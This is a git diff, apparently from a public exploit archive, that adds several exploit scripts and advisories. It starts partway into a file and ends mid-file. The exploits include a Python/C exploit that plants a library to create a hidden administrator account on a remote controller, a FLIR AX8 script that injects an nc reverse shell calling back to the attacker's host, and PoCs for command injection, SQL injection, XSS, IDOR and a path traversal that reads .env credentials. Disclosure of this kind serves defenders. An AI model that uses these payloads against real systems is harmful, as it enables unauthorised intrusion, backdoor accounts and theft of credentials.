APAQAgDwAACAAAAAAAAAAAAAAABAAAAAAAAAC2AAAABgAAAAMAAAAoDwEAKA8AANgAAAAFAAAAAAAAAAQAAAAIAAAAvwAAAAEAAAADAAAAABABAAAQAAAEAAAAAAAAAAAAAAAEAAAAAAAAAMUAAAABAAAAAwAAAAQQAQAEEAAALAAAAAAAAAAAAAAABAAAAAQAAADKAAAACAAAAAMAAAAwEAEAMBAAAAgAAAAAAAAAAAAAAAQAAAAAAAAAzwAAAAEAAAAwAAAAAAAAADAQAAArAAAAAAAAAAAAAAABAAAAAQAAAAEAAAACAAAAAAAAAAAAAABcEAAAUAMAABkAAAAvAAAABAAAABAAAAAJAAAAAwAAAAAAAAAAAAAArBMAAIUBAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAADEVAADYAAAAAAAAAAAAAAABAAAAAAAAAA=='
+#> For the source code of this pre-compiled C code, see below
+
+## Main program
+class CustomHTTPAdapter(requests.adapters.HTTPAdapter):
+ def init_poolmanager(self, *args, **kwargs):
+ context = requests.ssl.create_default_context()
+ context.set_ciphers('ALL:@SECLEVEL=0')
+ context.check_hostname = False
+ context.minimum_version = requests.ssl.TLSVersion.SSLv3
+ super().init_poolmanager(*args, **kwargs, ssl_context=context)
+
+def callURL(sURL, oSession, bData=None, lstProxies={}, boolVerbose=False):
+ try:
+ if bData: oResponse = oSession.post(sURL, data=bData, proxies=lstProxies, verify=False) ## Removed timeout here, as it may take a long time to upload files
+ else: oResponse = oSession.get(sURL, proxies=lstProxies, verify=False, timeout = iTimeout)
+ except: oResponse = None
+ return oResponse
+
+def checkVuln(sIP, oSession, lstProxies={}, boolVerbose=False):
+ oResponse = callURL(f'https://{sIP}/cgi-bin/login?LD_DEBUG=files', oSession, lstProxies = lstProxies)
+ if not oResponse is None and 'calling init: /lib/' in oResponse.text:
+ if boolVerbose:
+ print('[*] Data returned: ')
+ print(oResponse.text)
+ return True
+ return False
+
+def uploadAndRunLibrary(bData, oSession, sIP, lstProxies, boolVerbose=False):
+ iFFLAGS = 1
+ bFAlias = b'RACPKSSHAUTHKEY1'
+ bLib = bFAlias + (32 - len(bFAlias))*b'\0'
+ bLib += struct.pack('
+#include
+
+static void main(void) __attribute__((constructor));
+static void main(void)
+{
+ int pid1 = fork();
+ if(!pid1) {
+ execlp("racadm", "racadm", "config", "-g", "cfgUserAdmin", "-i", "13", "-o", "cfgUserAdminUserName", "user", (char*) NULL);
+ }
+ int pid2 = fork();
+ if(!pid2) {
+ execlp("racadm", "racadm", "config", "-g", "cfgUserAdmin", "-i", "13", "-o", "cfgUserAdminPassword", "Passw0rd", (char*) NULL);
+ }
+ int pid3 = fork();
+ if(!pid3) {
+ execlp("racadm", "racadm", "config", "-g", "cfgUserAdmin", "-i", "13", "-o", "cfgUserAdminPrivilege", "0x000001ff", (char*) NULL);
+ }
+ int pid4 = fork();
+ if(!pid4) {
+ execlp("racadm", "racadm", "config", "-g", "cfgUserAdmin", "-i", "13", "-o", "cfgUserAdminEnable", "1", (char*) NULL);
+ }
+ // Note: it takes 5 to 10 minutes before these 4 commands are executed
+}
+// Install "gcc-10-sh4-linux-gnu" (or replace gcc-10 with gcc-11 or newer) and compile the code like this:
+// sh4-linux-gnu-gcc-10 -shared -fPIC adduser.c -o adduser.so
+'''
\ No newline at end of file
diff --git a/exploits/hardware/webapps/52240.py b/exploits/hardware/webapps/52240.py
new file mode 100755
index 000000000..f5fe78b74
--- /dev/null
+++ b/exploits/hardware/webapps/52240.py
@@ -0,0 +1,82 @@
+# Exploit Title: FLIR AX8 1.46.16 - Remote Command Injection
+# Date: 8/19/2022
+# Exploit Author: Samy Younsi Naqwada (https://samy.link), SC
+# Vendor Homepage: https://www.flir.com/
+# Software Link: https://www.flir.com/products/ax8-automation/
+# PoC: https://www.youtube.com/watch?v=dh0_rfAIWok
+# Version: 1.46.16 and under.
+# Tested on: FLIR AX8 version 1.46.16 (Ubuntu)
+# CVE : CVE-2022-37061
+
+from __future__ import print_function, unicode_literals
+from bs4 import BeautifulSoup
+import argparse
+import requests
+import json
+import urllib3
+
+urllib3.disable_warnings()
+
+def banner():
+ flirLogo = """
+ ███████╗██╗ ██╗██████╗
+ ██╔════╝██║ ██║██╔══██╗
+ █████╗ ██║ ██║██████╔╝
+ ██╔══╝ ██║ ██║██╔══██╗
+ ██║ ███████╗██║██║ ██║
+ ╚═╝ ╚══════╝╚═╝╚═╝ ╚═╝
+ .---------------------.
+ █████╗ ██╗ ██╗ █████╗ /--'--.------.--------/|
+ ██╔══██╗╚██╗██╔╝██╔══██╗ |Say :) |__Ll__| [==] ||
+ ███████║ ╚███╔╝ ╚█████╔╝ |cheese!| .--. | '''' ||
+ ██╔══██║ ██╔██╗ ██╔══██╗ | |( () )| ||
+ ██║ ██║██╔╝ ██╗╚█████╔╝ | | `--` | |/
+ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚════╝ `-------`------`------`
+ \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m
+ \033[1;91mFLIR AX8 Unauthenticated OS Command Injection\033[1;m
+ FOR EDUCATIONAL PURPOSE ONLY.
+ """
+ return print('\033[1;94m{}\033[1;m'.format(flirLogo))
+
+def pingWebInterface(RHOST, RPORT):
+ url = 'http://{}:{}/login/'.format(RHOST, RPORT)
+ response = requests.get(url, allow_redirects=False, verify=False, timeout=60)
+ try:
+ if response.status_code != 200:
+ print('[!] \033[1;91mError: FLIR AX8 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
+ exit()
+ soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
+ version = soup.find('p', id='login-title').string
+ print('[INFO] {} detected.'.format(version))
+ except:
+ print('[ERROR] Can\'t grab the device version...')
+
+def execReverseShell(RHOST, RPORT, LHOST, LPORT):
+ url = 'http://{}:{}/res.php'.format(RHOST, RPORT)
+ payload = 'rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff'.format(LHOST, LHOST)
+ data = 'action=alarm&id=2;{}'.format(payload)
+ headers = {
+ 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
+ }
+ try:
+ print('[INFO] Executing reverse shell...')
+ response = requests.post(url, headers=headers, data=data, allow_redirects=False, verify=False)
+ print('Reverse shell successfully executed. {}:{}'.format(LHOST, LPORT))
+ return
+ except Exception as e:
+ print('Reverse shell failed. Make sure the FLIR AX8 device can reach the host {}:{}').format(LHOST, LPORT)
+ return False
+
+def main():
+ banner()
+ parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on FLIR AX8 devices.', add_help=False)
+ parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (FLIR AX8 device)", type=str, required=True)
+ parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)
+ parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
+ parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
+ args = parser.parse_args()
+ pingWebInterface(args.RHOST, args.RPORT)
+ execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/multiple/hardware/52231.html b/exploits/multiple/hardware/52231.html
new file mode 100644
index 000000000..b99df8c0f
--- /dev/null
+++ b/exploits/multiple/hardware/52231.html
@@ -0,0 +1,117 @@
+
+
+
+
+
+
+ P R O J E C T
+
+ .|
+ | |
+ |'| ._____
+ ___ | | |. |' .---"|
+ _ .-' '-. | | .--'| || | _| |
+ .-'| _.| | || '-__ | | | || |
+ |' | |. | || | | | | || |
+ ____| '-' ' "" '-' '-.' '` |____
+░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
+ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
+
+
+
+// Add User/Admin
+
+
+
+
+
+// Add User/Admin
+
+
+
+
+
+// Delete User/Admin
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52228.txt b/exploits/multiple/webapps/52228.txt
new file mode 100644
index 000000000..756920939
--- /dev/null
+++ b/exploits/multiple/webapps/52228.txt
@@ -0,0 +1,56 @@
+# Exploit Title: Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS)
+# Exploit Author: Ayato Shitomi @ Fore-Z co.ltd
+# Demo Video: https://www.youtube.com/watch?v=udQgVogsmhA
+# Vendor Homepage: https://teedy.io/
+# Software Link: https://github.com/Tomblib0/Teedy
+# Version: 1.11
+# Tested on: Linux
+# CVE : CVE-2024-46278
+
+There is a vulnerability that causes XSS when downloading files.
+XSS vulnerability could allow a Teedy administrator to rob an account with a few clicks.
+
+
+Login as an attacker’s account.
+Upload this file as html type. You have to change “Origin” and “Referer” and argument for fetch in need.
+
+```
+
+```
+
+Login with another account. eg. admin
+Click on the file uploaded by the attacker and select Download this file.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52236.txt b/exploits/multiple/webapps/52236.txt
new file mode 100644
index 000000000..aab312a8c
--- /dev/null
+++ b/exploits/multiple/webapps/52236.txt
@@ -0,0 +1,24 @@
+# Exploit Title: ProConf 6.0 - Insecure Direct Object Reference (IDOR)
+# Date: 19/07/2018
+# Exploit Author: S. M. Zia Ur Rashid, SC
+# Author Contact: https://www.linkedin.com/in/ziaurrashid/
+# Vendor Homepage: http://proconf.org & http://myproconf.org
+# Version: <= 6.0
+# Tested on: Windows
+# CVE : CVE-2018-16606
+# Patched Version: 6.1
+
+# Description:
+In ProConf before 6.1, an Insecure Direct Object Reference (IDOR) allows
+any author to view and grab all submitted papers (Title and Abstract) and
+their authors' personal information (Name, Email, Organization, and
+Position) by changing the value of Paper ID (the pid parameter).
+
+# PROOF-OF-CONCEPT
+Step 1: Sign In as an author for a conference & submit a paper. Youall get
+a paper ID.
+Step 2: Now go to paper details and change the value of Paper ID (param
+pid=xxxx) to nearest previous value to view others submitted paper &
+authors information.
+http://
+[host]/conferences/[conference-name]/author/show_paper_details.php?pid=xxxx
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52238.txt b/exploits/multiple/webapps/52238.txt
new file mode 100644
index 000000000..c62b85b88
--- /dev/null
+++ b/exploits/multiple/webapps/52238.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Garage Management System 1.0 (categoriesName) - Stored XSS
+# Date: 18-09-2022
+# Exploit Author: Sam Wallace, SC
+# Software Link: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
+# Version: 1.0
+# Tested on: Debian
+# CVE : CVE-2022-41358
+
+Summary:
+Garage Management System utilizes client side validation to prevent XSS.
+Using burp, a request can be modified and replayed to the server bypassing this validation which creates an avenue for XSS.
+Parameter: categoriesName
+URI: /garage/php_action/createCategories.php
+POC:
+POST /garage/php_action/createCategories.php HTTP/1.1
+Host: 10.24.0.69
+Content-Length: 367
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://10.24.0.69
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://10.24.0.69/garage/add-category.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
+Connection: close
+------WebKitFormBoundaryqKDsN4gmatTEEkhS
+Content-Disposition: form-data; name="categoriesName"
+
+------WebKitFormBoundaryqKDsN4gmatTEEkhS
+Content-Disposition: form-data; name="categoriesStatus"
+1
+------WebKitFormBoundaryqKDsN4gmatTEEkhS
+Content-Disposition: form-data; name="create"
+------WebKitFormBoundaryqKDsN4gmatTEEkhS--
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52241.txt b/exploits/multiple/webapps/52241.txt
new file mode 100644
index 000000000..b508df89c
--- /dev/null
+++ b/exploits/multiple/webapps/52241.txt
@@ -0,0 +1,137 @@
+# Exploit Title: Ethercreative Logs 3.0.3 - Path Traversal
+# Date: 2022.01.26
+# Exploit Author: Steffen Rogge, SC
+# Vendor Homepage: https://github.com/ethercreative/logs
+# Software Link: https://plugins.craftcms.com/logs
+# Version: <=3.0.3
+# Tested on: Linux
+# CVE : CVE-2022-23409
+
+product: Ethercreative Logs plugin for Craft CMS
+fixed version: >=3.0.4
+impact: Medium
+found: 2021-07-06
+SEC Consult Vulnerability Lab
+An integrated part of SEC Consult, an Atos company
+Europe | Asia | North America
+https://www.sec-consult.com
+=======================================================================
+Vendor description:
+-------------------
+"A quick and dirty way to access your logs from inside the CP"
+As found on the plugin store page: https://plugins.craftcms.com/logs
+Active Installs 4,093 (as of 2021-07-07)
+Business recommendation:
+------------------------
+The vendor provides a patched version v3.0.4 which should be installed immediately.
+Vulnerability overview/description:
+-----------------------------------
+1) Authenticated Path Traversal (CVE-2022-23409)
+The plugin "Logs" provides a functionality to read log files of the Craft CMS system inside
+the backend of the CMS. As the requested logfile is not properly validated, an attacker is
+able to request arbitrary files from the underlying file system with the permissions of the
+web service user.
+Proof of concept:
+-----------------
+1) Authenticated Path Traversal (CVE-2022-23409)
+As the plugin is installed as an administrator of the system and the function is only accessible
+after being logged in as an admin, an attacker needs to be authenticated as an administrator in
+the backend in order to extract the needed "{MD5}_identity" cookie for the crafted request.
+The vulnerable endpoint is provided by the plugin under the following path:
+https://vulnerablesite.com/index.php/admin/actions/logs/logs/stream
+The vulnerable controller for that endpoint can be found here:
+https://github.com/ethercreative/logs/blob/master/src/Controller.php
+The function "actionStream()" provides an endpoint for the Craft CMS and does not validate input
+values before file content is being read by the function "file_get_contents".
+public function actionStream ()
+{
+$logsDir = \Craft::getAlias('@storage/logs');
+$logFile = \Craft::$app->request->getParam('log');
+$currentLog = \Craft::$app->request->get('log', $logFile);
+$log = file_get_contents($logsDir . '/' . $currentLog);
+exit($log);
+}
+A crafted GET parameter with the name "log" can be used to access files on the underlying filesystem
+with rights as the user executing the web server. In most cases this will be the user "www-data".
+In order to read the file ".env" or ".env.php" which contains the environment configuration and as
+such also the database credentials, the following request can be used:
+GET /admin/actions/logs/logs/stream?log=../../.env HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
+Connection: close
+Cookie: 1031b8c41dfff97a311a7ac99863bdc5_identity=;
+The response then discloses the file content of the file ".env":
+HTTP/1.1 200 OK
+Date: Thu, 07 Jul 2021 10:08:52 GMT
+Server: nginx
+Content-Type: text/html; charset=UTF-8
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Set-Cookie: CraftSessionId=2uisculfj8t9q1tnbiukl6ogjf; path=/; secure; HttpOnly
+Content-Length: 1600
+Connection: close
+[...]
+$craftEnvVars = [
+'DB_DRIVER' => 'mysql',
+'DB_SERVER' => '********',
+'DB_USER' => '********',
+'DB_PASSWORD' => '********',
+'DB_DATABASE' => '********',
+'DB_SCHEMA' => 'public',
+'DB_TABLE_PREFIX' => '',
+'DB_PORT' => '********',
+'SECURITY_KEY' => '********',
+[...]
+Vulnerable / tested versions:
+-----------------------------
+The following version has been tested which was the latest version available at the time
+of the test:
+* Version 3.0.3 released on November 25, 2019
+Distributed through the Craft Plugin Store https://plugins.craftcms.com/logs
+Vendor contact timeline:
+------------------------
+2021-07-07: Contacting vendor through dev@ethercreative.co.uk
+2021-07-08: Response from vendor, no encryption available but vendor accepted to be responsible
+for any risks involved with plaintext communication
+2021-07-08: Advisory was sent to vendor unencrypted
+2021-07-09: Vendor released a patch for this vulnerability with version 3.0.4
+(https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4)
+2021-07-12: Updated Plugin has been tested on an up-to-date CraftCMS installation
+(CraftCMS 3.7.0, PHP 8, MySQL 8, Logs Plugin 3.0.4)
+2022-01-24: Release of security advisory
+Solution:
+---------
+The vendor released a patched version 3.0.4 or higher which can be retrieved from their
+website/github:
+https://plugins.craftcms.com/logs
+https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4
+Workaround:
+-----------
+Uninstall/Disable the plugin and access the Craft CMS logs via SSH or other services.
+Advisory URL:
+-------------
+https://sec-consult.com/vulnerability-lab/
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+SEC Consult Vulnerability Lab
+SEC Consult, an Atos company
+Europe | Asia | North America
+About SEC Consult Vulnerability Lab
+The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
+Atos company. It ensures the continued knowledge gain of SEC Consult in the
+field of network and application security to stay ahead of the attacker. The
+SEC Consult Vulnerability Lab supports high-quality penetration testing and
+the evaluation of new offensive and defensive technologies for our customers.
+Hence our customers obtain the most current information about vulnerabilities
+and valid recommendation about the risk profile of new technologies.
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Interested to work with the experts of SEC Consult?
+Send us your application https://sec-consult.com/career/
+Interested in improving your cyber security with the experts of SEC Consult?
+Contact our local offices https://sec-consult.com/contact/
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+EOF Steffen Rogge / @2022
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52248.txt b/exploits/multiple/webapps/52248.txt
new file mode 100644
index 000000000..039d0dbf8
--- /dev/null
+++ b/exploits/multiple/webapps/52248.txt
@@ -0,0 +1,91 @@
+# Exploit Title: WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection
+# Date: 2024-03-25
+# Exploit Author: Ivan Spiridonov - xbz0n
+# Software Link: https://codecanyon.net/item/woocommerce-customers-manager/10965432
+# Version: 29.4
+# Tested on: Ubuntu 22.04
+# CVE: CVE-2024-0399
+
+## SQL Injection
+
+The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to an SQL injection exploitable by Subscriber+ role.
+
+## Affected Components
+
+- **Plugin:** WooCommerce Customers Manager
+- **Version:** 29.4
+- **Affected Parameters:** 'max_amount', 'max_amount_total', 'min_amount', 'min_amount_total'
+- **Affected Endpoint:** /wp-admin/admin-ajax.php
+
+## Description
+
+The vulnerability is located within the transaction amount parameters like 'max_amount', 'max_amount_total', 'min_amount', and 'min_amount_total' used in the admin AJAX endpoint. By injecting SQL commands into these parameters, authenticated attackers can manipulate SQL queries leading to a time-based SQL Injection vulnerability.
+
+## Proof of Concept
+
+### Manual Exploitation
+
+```http
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: http://localhost/wp-admin/admin.php?page=wccm-discover-customer
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------2461714219322283440478088295
+Content-Length: 1877
+Origin: http://localhost
+Connection: close
+Cookie: Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------2461714219322283440478088295
+Content-Disposition: form-data; name="action"
+wccm_get_orders_tot_num
+-----------------------------2461714219322283440478088295
+Content-Disposition: form-data; name="start_date"
+2024-01-09
+-----------------------------2461714219322283440478088295
+Content-Disposition: form-data; name="end_date"
+2024-01-11
+-----------------------------2461714219322283440478088295
+Content-Disposition: form-data; name="customer_ids"
+-----------------------------2461714219322283440478088295
+Content-Disposition: form-data; name="product_ids"
+-----------------------------2461714219322283440478088295
+Content-Disposition: form-data; name="category_ids"
+-----------------------------2461714219322283440478088295
+Content-Disposition: form-data; name="min_amount"
+0
+-----------------------------2461714219322283440478088295
+Content-Disposition: form-data; name="max_amount"
+0
+-----------------------------2461714219322283440478088295
+Content-Disposition: form-data; name="min_amount_total"
+0
+-----------------------------2461714219322283440478088295
+Content-Disposition: form-data; name="max_amount_total"
+(select*from(select(sleep(20)))a)
+-----------------------------2461714219322283440478088295
+Content-Disposition: form-data; name="product_relationship"
+or
+-----------------------------2461714219322283440478088295
+Content-Disposition: form-data; name="product_category_relationship"
+or
+-----------------------------2461714219322283440478088295
+Content-Disposition: form-data; name="product_category_filters_relationship"
+and
+-----------------------------2461714219322283440478088295
+Content-Disposition: form-data; name="statuses"
+wc-pending,wc-processing,wc-on-hold,wc-completed,wc-cancelled,wc-refunded,wc-failed,wc-checkout-draft
+-----------------------------2461714219322283440478088295--
+```
+
+If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.
+
+## Recommendations
+
+Users of WooCommerce Customers Manager v29.4 are strongly advised to restrict access to the affected endpoint and update the plugin as soon as a fixed version is released. This advisory serves as a notice to all users of Smart Manager v8.27.0 to take immediate action in updating their plugin to protect against this SQL Injection vulnerability.
\ No newline at end of file
diff --git a/exploits/php/hardware/52232.txt b/exploits/php/hardware/52232.txt
new file mode 100644
index 000000000..c2fbc2753
--- /dev/null
+++ b/exploits/php/hardware/52232.txt
@@ -0,0 +1,79 @@
+# Exploit title : ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) Remote Code Execution
+# Vendor: ABB Ltd.
+# Product web page: https://www.global.abb
+# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
+ Firmware: <=4.00.00
+
+Summary: ASPECT is an award-winning scalable building energy management
+and control solution designed to allow users seamless access to their
+building data through standard building protocols including smart devices.
+
+Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated
+blind command injection vulnerability. Input passed to the serial and ManufactureDate
+POST parameters is not properly sanitized, allowing attackers to execute arbitrary
+shell commands on the system. While factory test scripts included in the upgrade
+bundle are typically deleted, a short window for exploitation exists when the device
+is in the manufacturing phase.
+
+Tested on: GNU/Linux 3.15.10 (armv7l)
+ GNU/Linux 3.10.0 (x86_64)
+ GNU/Linux 2.6.32 (x86_64)
+ Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
+ Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
+ PHP/7.3.11
+ PHP/5.6.30
+ PHP/5.4.16
+ PHP/4.4.8
+ PHP/5.3.3
+ AspectFT Automation Application Server
+ lighttpd/1.4.32
+ lighttpd/1.4.18
+ Apache/2.2.15 (CentOS)
+ OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
+ OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
+ ErgoTech MIX Deployment Server 2.0.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2025-5894
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5894.php
+
+
+21.04.2024
+
+--
+
+
+$ cat project
+
+ P R O J E C T
+
+ .|
+ | |
+ |'| ._____
+ ___ | | |. |' .---"|
+ _ .-' '-. | | .--'| || | _| |
+ .-'| _.| | || '-__ | | | || |
+ |' | |. | || | | | | || |
+ ____| '-' ' "" '-' '-.' '` |____
+░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
+ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
+
+
+$ curl http://192.168.73.31/factorySetSerialNum.php \
+> -d "serial=;sleep 2&ManufactureDate=;sleep 3"
\ No newline at end of file
diff --git a/exploits/php/hardware/52233.txt b/exploits/php/hardware/52233.txt
new file mode 100644
index 000000000..d16676a49
--- /dev/null
+++ b/exploits/php/hardware/52233.txt
@@ -0,0 +1,79 @@
+# Exploit title: ABB Cylon Aspect 4.00.00 (factorySaved.php) Unauthenticated XSS
+# Vendor: ABB Ltd.
+# Product web page: https://www.global.abb
+# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
+ Firmware: <=4.00.00
+
+Summary: ASPECT is an award-winning scalable building energy management
+and control solution designed to allow users seamless access to their
+building data through standard building protocols including smart devices.
+
+Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated
+reflected cross-site scripting vulnerability in the 'title' GET parameter.
+Input is not properly sanitized before being returned to the user, allowing
+the execution of arbitrary HTML/JS code in a user's browser session in the
+context of the affected site. While the factory test scripts included in the
+upgrade bundle are typically deleted, a short window for exploitation exists
+when the device is in the manufacturing phase.
+
+Tested on: GNU/Linux 3.15.10 (armv7l)
+ GNU/Linux 3.10.0 (x86_64)
+ GNU/Linux 2.6.32 (x86_64)
+ Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
+ Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
+ PHP/7.3.11
+ PHP/5.6.30
+ PHP/5.4.16
+ PHP/4.4.8
+ PHP/5.3.3
+ AspectFT Automation Application Server
+ lighttpd/1.4.32
+ lighttpd/1.4.18
+ Apache/2.2.15 (CentOS)
+ OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
+ OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
+ ErgoTech MIX Deployment Server 2.0.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2025-5893
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5893.php
+
+
+21.04.2024
+
+--
+
+
+$ cat project
+
+ P R O J E C T
+
+ .|
+ | |
+ |'| ._____
